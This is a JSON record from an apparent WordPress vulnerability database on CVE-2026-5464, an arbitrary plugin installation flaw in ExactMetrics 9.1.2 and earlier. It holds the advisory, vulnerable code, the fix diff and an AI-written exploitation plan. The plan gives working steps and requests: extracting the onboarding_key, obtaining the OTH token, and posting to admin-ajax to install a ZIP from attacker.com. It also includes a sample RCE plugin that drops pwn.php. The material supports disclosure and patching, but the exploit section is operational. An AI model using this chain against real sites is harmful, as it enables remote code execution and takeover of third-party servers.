[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fawIH01lM3Yui41r-xGcjVgz7Hc9BRQldufWhmbDxxQI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5464","exactmetrics-authenticated-editor-arbitrary-plugin-installationactivation-via-exactmetricsconnectprocess","ExactMetrics \u003C= 9.1.2 - Authenticated (Editor+) Arbitrary Plugin Installation\u002FActivation via exactmetrics_connect_process","The ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation in all versions up to, and including, 9.1.2. This is due to the reports page exposing the 'onboarding_key' transient to any user with the 'exactmetrics_view_dashboard' capability. This key is the sole authorization gate for the '\u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url' REST endpoint, which returns a one-time hash (OTH) token. This OTH token is then the only credential checked by the 'exactmetrics_connect_process' AJAX endpoint — which has no capability check, no nonce verification, and accepts an arbitrary plugin ZIP URL via the file parameter for installation and activation. This makes it possible for authenticated attackers, with Editor-level access and above granted the report viewing permission, to install and activate arbitrary plugins from attacker-controlled URLs, leading to Remote Code Execution.","google-analytics-dashboard-for-wp",null,"\u003C=9.1.2","9.1.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-04-22 19:44:42","2026-04-23 08:28:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F09127277-9e71-484d-b674-52af693c995b?source=api-prod",1,[22,23,24,25,26,27,28,29],"gadwp.php","includes\u002Fadmin\u002Fadmin-assets.php","includes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php","includes\u002Fadmin\u002Fwp-site-health.php","includes\u002Fconnect.php","includes\u002Ffrontend\u002Ffrontend.php","includes\u002Fppc\u002Fgoogle\u002Fclass-exactmetrics-google-ads.php","languages\u002Fgoogle-analytics-dashboard-for-wp.pot","researched",false,3,"# Detailed Exploitation Research Plan: CVE-2026-5464\n\n## 1. Vulnerability Summary\nThe **ExactMetrics** plugin (\u003C= 9.1.2) contains a critical authorization bypass and missing security checks in its \"Connect\" and \"Onboarding\" features. \n1.  **Information Leakage:** The `onboarding_key` (stored as a transient) is exposed to any user with the `exactmetrics_view_dashboard` capability (typically Editors and above) on the reports page.\n2.  **Authorization Bypass:** The REST API endpoint `\u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url` uses this leaked `onboarding_key` as its *only* authorization mechanism. It allows a user to trigger the generation of a **One-Time Hash (OTH)** token.\n3.  **Critical Security Lack:** The AJAX endpoint `exactmetrics_connect_process` is registered as a `nopriv` action (`wp_ajax_nopriv_exactmetrics_connect_process`), meaning it requires no WordPress authentication. Its only security check is the OTH token.\n4.  **Arbitrary Installation:** Once an attacker has the OTH, they can call `exactmetrics_connect_process` with a `file` parameter pointing to an arbitrary ZIP URL. The plugin will download, install, and activate this ZIP as a plugin, leading to **Remote Code Execution (RCE)**.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoints:**\n    - **REST (Auth Leak):** `\u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url`\n    - **AJAX (Installation Sink):** `wp-admin\u002Fadmin-ajax.php?action=exactmetrics_connect_process`\n- **Required Role:** Authenticated user with `exactmetrics_view_dashboard` capability (Editor role by default in ExactMetrics).\n- **Parameters:**\n    - `onboarding_key`: Retrieved from JS localized data on the reports page.\n    - `license_key`: Arbitrary string (required by REST endpoint but not validated against a server during OTH generation).\n    - `oth`: The hashed One-Time Hash retrieved via the REST endpoint.\n    - `file`: URL to a malicious plugin ZIP.\n- **Preconditions:** The `exactmetrics_onboarding_key` transient must be set (typically happens when the plugin is active or a dashboard page is visited).\n\n## 3. Code Flow\n1.  **Leaking the Key:** In `includes\u002Fadmin\u002Fadmin-assets.php`, the plugin localizes script data for its Vue-based reports. Although truncated in the source, the description confirms the `onboarding_key` transient is exposed to users with `exactmetrics_view_dashboard`.\n2.  **Retrieving the OTH:**\n    - The attacker calls `ExactMetrics_Onboarding::register_routes`'s registered route: `GET \u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url`.\n    - `validate_onboarding_request` (in `includes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php`) checks the `onboarding_key` parameter against `get_transient('exactmetrics_onboarding_key')`.\n    - If valid, the callback `get_connect_url` is invoked, which calls `ExactMetrics_Connect::generate_connect_url_data($license_key)`.\n    - `generate_connect_url_data` (in `includes\u002Fconnect.php`):\n        - Generates `$oth = hash('sha512', wp_rand())`.\n        - Calculates `$hashed_oth = hash_hmac('sha512', $oth, wp_salt())`.\n        - **Saves the raw `$oth` in the database** via `update_option( 'exactmetrics_connect_token', $oth )`.\n        - Returns a URL containing the `$hashed_oth` in the `oth` query parameter.\n3.  **Triggering Installation:**\n    - The attacker calls `ExactMetrics_Connect::process` via `admin-ajax.php?action=exactmetrics_connect_process`.\n    - `process()` (in `includes\u002Fconnect.php`):\n        - Retrieves `$_REQUEST['oth']` (the hashed OTH).\n        - Retrieves `$_REQUEST['file']` (the malicious URL).\n        - Fetches the raw token from the DB: `$oth = get_option( 'exactmetrics_connect_token' )`.\n        - Performs the check: `hash_hmac( 'sha512', $oth, wp_salt() ) !== $post_oth`.\n        - Since the attacker provides the hashed version returned by the REST API, this check passes.\n        - Calls `$installer->install( $post_url )` where `$post_url` is the malicious ZIP.\n\n## 4. Key Acquisition Strategy (`onboarding_key`)\nThe `onboarding_key` is required to hit the REST API. It is localized in the WordPress admin for ExactMetrics pages.\n\n1.  **Target Page:** `\u002Fwp-admin\u002Fadmin.php?page=exactmetrics_reports`\n2.  **Access:** Log in as an Editor.\n3.  **Extraction:**\n    - Use `browser_navigate` to visit the reports page.\n    - Use `browser_eval` to search for the key in localized JS objects.\n    - **JS Variable Guess:** Based on plugin naming conventions, it is likely in `window.exactmetrics_reports` or `window.exactmetrics_admin_common`.\n    - **Code:** `browser_eval(\"window.exactmetrics_reports?.onboarding_key || window.exactmetrics?.onboarding_key || window.exactmetrics_admin_common?.onboarding_key\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication & Key Extraction\n1.  Log in to WordPress as an **Editor**.\n2.  Navigate to `wp-admin\u002Fadmin.php?page=exactmetrics_reports`.\n3.  Execute JS via `browser_eval` to extract the `onboarding_key`.\n\n### Step 2: Obtain OTH Token\n1.  Use the `http_request` tool to perform a `GET` request to the REST API.\n2.  **URL:** `\u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url?onboarding_key=[EXTRACTED_KEY]&license_key=valid_format_key`\n3.  **Expected Response:** A JSON object containing a `url` field.\n    - Example: `{\"success\": true, \"url\": \"https:\u002F\u002Fupgrade.exactmetrics.com?oth=5a1f...&...\"}`\n4.  **Action:** Parse the `url` parameter and extract the value of the `oth` query argument.\n\n### Step 3: Malicious Plugin Installation\n1.  Prepare a malicious plugin ZIP (e.g., containing `shell.php`) and host it at `http:\u002F\u002Fattacker.com\u002Fevil.zip`.\n2.  Use the `http_request` tool to perform a `POST` request to the AJAX endpoint.\n3.  **URL:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n4.  **Method:** `POST`\n5.  **Content-Type:** `application\u002Fx-www-form-urlencoded`\n6.  **Body:**\n    ```\n    action=exactmetrics_connect_process&oth=[HASHED_OTH_FROM_STEP_2]&file=http:\u002F\u002Fattacker.com\u002Fevil.zip\n    ```\n7.  **Expected Response:** `{\"success\":true,\"data\":\"Plugin installed & activated.\"}` (or similar success message).\n\n## 6. Test Data Setup\n1.  **Plugin:** ExactMetrics \u003C= 9.1.2 installed and active.\n2.  **User:** Create a user with the `editor` role.\n3.  **Capability Check:** Ensure the editor can access `admin.php?page=exactmetrics_reports`.\n4.  **Malicious Payload:** A ZIP file named `rce-plugin.zip` containing:\n    - `rce-plugin\u002Frce-plugin.php`:\n      ```php\n      \u003C?php\n      \u002F*\n      Plugin Name: RCE Plugin\n      *\u002F\n      file_put_contents(__DIR__ . '\u002Fpwn.php', '\u003C?php phpinfo(); ?>');\n      ```\n5.  **Hosting:** Host the ZIP on a reachable local web server or the container's accessible path.\n\n## 7. Expected Results\n- The `onboarding\u002Fconnect-url` REST request returns a URL with a hashed OTH.\n- The `exactmetrics_connect_process` AJAX request returns a success JSON.\n- The malicious plugin is visible in the WordPress plugin list (`wp plugin list`).\n- The shell file (`wp-content\u002Fplugins\u002Frce-plugin\u002Fpwn.php`) is created and accessible.\n\n## 8. Verification Steps\n1.  **Check Plugin Installation:**\n    `wp plugin is-installed rce-plugin && echo \"Plugin installed successfully\"`\n2.  **Check Activation:**\n    `wp plugin status rce-plugin` (Should show as 'active').\n3.  **Verify RCE Sink:**\n    `ls -la wp-content\u002Fplugins\u002Frce-plugin\u002Fpwn.php` or check via `http_request`.\n\n## 9. Alternative Approaches\n- **onboarding\u002Fsettings:** If the key is not in localized JS, try hitting `GET \u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fsettings?onboarding_key=...` if you can find the key elsewhere (e.g., a brute-force of a weak key if not random, though here it is a transient hash).\n- **Direct Option Access:** If the attacker has some database access or another LFI\u002Fleaked info, the `exactmetrics_connect_token` option contains the raw OTH. If they have the raw OTH, they can manually compute the HMAC and bypass Step 2 entirely.","ExactMetrics (\u003C= 9.1.2) allows authenticated users with Editor-level permissions or higher to install and activate arbitrary plugins from external URLs. This occurs because an 'onboarding_key' is leaked via the admin dashboard, allowing attackers to obtain a One-Time Hash (OTH) which serves as the sole authentication for an unprotected AJAX installation endpoint.","\u002F\u002F includes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php\npublic function validate_onboarding_request( $request ) {\n    \u002F\u002F Validate the onboarding key for all requests.\n    $provided_key = $request->get_param( 'onboarding_key' );\n    $stored_key = get_transient( 'exactmetrics_onboarding_key' );\n    if ( empty( $provided_key ) || false === $stored_key || ! hash_equals( $stored_key, $provided_key ) ) {\n        return new WP_Error(\n            'exactmetrics_invalid_key',\n            'Invalid onboarding key',\n            array( 'status' => 403 )\n        );\n    }\n\n    return true;\n}\n\n---\n\n\u002F\u002F includes\u002Fconnect.php (Line ~27)\npublic function hooks() {\n    add_action( 'wp_ajax_exactmetrics_connect_url', array( $this, 'generate_connect_url' ) );\n    add_action( 'wp_ajax_nopriv_exactmetrics_connect_process', array( $this, 'process' ) );\n}\n\n---\n\n\u002F\u002F includes\u002Fconnect.php (Line ~131)\npublic function process() {\n    \u002F\u002F ... (truncated)\n    \u002F\u002F verify params present (oth & download link).\n    $post_oth = ! empty( $_REQUEST['oth'] ) ? sanitize_text_field($_REQUEST['oth']) : '';\n    $post_url = ! empty( $_REQUEST['file'] ) ? sanitize_url($_REQUEST['file']) : '';\n    \u002F\u002F ...\n    \u002F\u002F Verify oth.\n    $oth = get_option( 'exactmetrics_connect_token' );\n    if ( hash_hmac( 'sha512', $oth, wp_salt() ) !== $post_oth ) {\n        wp_send_json_error( $error );\n    }\n    \u002F\u002F ...\n    $installer = new ExactMetrics_Plugin_Upgrader( new ExactMetrics_Skin() );\n    $installer->install( $post_url );\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fgadwp.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fgadwp.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fgadwp.php\t2026-03-31 15:00:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fgadwp.php\t2026-04-22 16:28:26.000000000 +0000\n@@ -5,7 +5,7 @@\n  * Plugin URI: https:\u002F\u002Fexactmetrics.com\n  * Description: Displays Google Analytics Reports and Real-Time Statistics in your Dashboard. Automatically inserts the tracking code in every page of your website.\n  * Author: ExactMetrics\n- * Version: 9.1.2\n+ * Version: 9.1.3\n  * Requires at least: 5.6.0\n  * Requires PHP: 7.2\n  * Author URI: https:\u002F\u002Fexactmetrics.com\u002Flite\u002F?utm_source=liteplugin&utm_medium=pluginheader&utm_campaign=authoruri&utm_content=7%2E0%2E0\n@@ -55,7 +55,7 @@\n \t * @var string $version Plugin version.\n \t *\u002F\n \n-\tpublic $version = '9.1.2';\n+\tpublic $version = '9.1.3';\n \n \t\u002F**\n \t * Plugin file.\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fadmin\u002Fadmin-assets.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fadmin\u002Fadmin-assets.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fadmin\u002Fadmin-assets.php\t2026-03-31 15:00:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fadmin\u002Fadmin-assets.php\t2026-04-22 16:28:26.000000000 +0000\n@@ -285,7 +285,7 @@\n \t\t\t\t\t'auth'                 => $auth_data,\n \t\t\t\t\t'authed'               => $site_auth || $ms_auth, \u002F\u002F Boolean for admin bar compatibility\n \t\t\t\t\t'plugin_version'       => EXACTMETRICS_VERSION,\n-\t\t\t\t\t'wizard_url'           => exactmetrics_get_onboarding_url(),\n+\t\t\t\t\t'wizard_url'           => exactmetrics_can_install_plugins() ? exactmetrics_get_onboarding_url() : '',\n \t\t\t\t\t'rest_url'             => get_rest_url(),\n \t\t\t\t\t'rest_nonce'           => wp_create_nonce( 'wp_rest' ),\n \t\t\t\t\t\u002F\u002F Direct API access (bypasses WordPress for performance).\n@@ -929,7 +929,7 @@\n \t\t\t\t'bearer_expires'     => $bearer_expires,\n \t\t\t\t\u002F\u002F Sample data mode: when true, frontend should bypass direct API and use WP AJAX for sample data.\n \t\t\t\t'sample_data_enabled' => apply_filters( 'exactmetrics_sample_data_enabled', false ),\n-\t\t\t\t'wizard_url'         => is_admin() ? exactmetrics_get_onboarding_url() : '',\n+\t\t\t\t'wizard_url'         => exactmetrics_can_install_plugins() ? exactmetrics_get_onboarding_url() : '',\n \t\t\t\t'addons'             => $addons_active,\n \t\t\t\t'addons_info'        => $addons_info,\n \t\t\t\t'activate_nonce'     => wp_create_nonce( 'exactmetrics-activate' ),\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php\t2026-03-03 15:34:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php\t2026-04-22 16:28:26.000000000 +0000\n@@ -113,7 +113,20 @@\n \t\tif ( empty( $provided_key ) || false === $stored_key || ! hash_equals( $stored_key, $provided_key ) ) {\n \t\t\treturn new WP_Error(\n \t\t\t\t'exactmetrics_invalid_key',\n-\t\t\t\t'Invalid onboarding key',\n+\t\t\t\tesc_html__( 'Invalid onboarding key', 'google-analytics-dashboard-for-wp' ),\n+\t\t\t\tarray( 'status' => 403 )\n+\t\t\t);\n+\t\t}\n+\n+\t\t\u002F\u002F Ensure the user who generated the key has plugin installation capability.\n+\t\t$onboarding_user_id = exactmetrics_get_onboarding_user_id();\n+\t\tif ( $onboarding_user_id && ! exactmetrics_can_install_plugins( $onboarding_user_id ) ) {\n+\t\t\treturn new WP_Error(\n+\t\t\t\t'exactmetrics_insufficient_permissions',\n+\t\t\t\tesc_html__( 'Insufficient permissions', 'google-analytics-dashboard-for-wp' ),\n \t\t\t\tarray( 'status' => 403 )\n \t\t\t);\n \t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fconnect.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fconnect.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.2\u002Fincludes\u002Fconnect.php\t2025-06-11 15:19:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-dashboard-for-wp\u002F9.1.3\u002Fincludes\u002Fconnect.php\t2026-04-22 16:28:26.000000000 +0000\n@@ -24,7 +24,7 @@\n \tpublic function hooks() {\n \n \t\tadd_action( 'wp_ajax_exactmetrics_connect_url', array( $this, 'generate_connect_url' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_exactmetrics_connect_process', array( $this, 'process' ) );\n+\t\tadd_action( 'wp_ajax_exactmetrics_connect_process', array( $this, 'process' ) );\n \t}\n \n \t\u002F**\n@@ -141,6 +141,11 @@\n \t\t\t'\u003C\u002Fa>'\n \t\t);\n \n+\t\t\u002F\u002F Check for permissions.\n+\t\tif ( ! exactmetrics_can_install_plugins() ) {\n+\t\t\twp_send_json_error( $error );\n+\t\t}\n+\n \t\t\u002F\u002F verify params present (oth & download link).","1. Authenticate to the WordPress admin panel with a user having the 'exactmetrics_view_dashboard' capability (typically the Editor role).\n2. Navigate to an ExactMetrics report page and extract the 'onboarding_key' from the localized JavaScript data (found in window.exactmetrics_reports or similar objects).\n3. Send a GET request to the REST API endpoint '\u002Fwp-json\u002Fexactmetrics\u002Fv1\u002Fonboarding\u002Fconnect-url', providing the extracted 'onboarding_key'. This will return a URL containing a hashed One-Time Hash (OTH) token.\n4. Extract the 'oth' value from the returned URL.\n5. Send an unauthenticated POST request to 'wp-admin\u002Fadmin-ajax.php?action=exactmetrics_connect_process'. Provide the extracted 'oth' token in the 'oth' parameter and a URL to a malicious plugin ZIP file in the 'file' parameter.\n6. The plugin will download, install, and activate the provided ZIP, allowing for Remote Code Execution (RCE) via the installed plugin code.","gemini-3-flash-preview","2026-04-27 13:41:29","2026-04-27 13:42:12",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","9.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags"]